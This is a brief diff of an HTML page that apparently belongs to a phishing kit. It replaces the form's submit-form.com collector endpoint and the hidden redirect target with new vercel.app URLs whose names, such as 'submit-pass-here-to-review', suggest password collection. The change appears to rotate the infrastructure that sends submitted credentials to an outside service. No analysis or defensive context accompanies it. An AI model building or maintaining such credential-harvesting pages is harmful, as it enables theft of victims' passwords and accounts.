--- a/request (1).html
+++ b/request (1).html
@@ -9,8 +9,8 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/yb4Augqfj" method="post">
-            <input type="hidden" name="_redirect" value="https://submit-pass-here-to-review.vercel.app/"/>
+        <form action="https://submit-form.com/NsZDhzXuT" method="post">
+            <input type="hidden" name="_redirect" value="https://review-pass-here-for-page-terms.vercel.app/"/>
             <div id="root">
                 <div>
                     <form>
@@ -53,5 +53,6 @@
             </div>
     </body>
 </html>
+
 
 
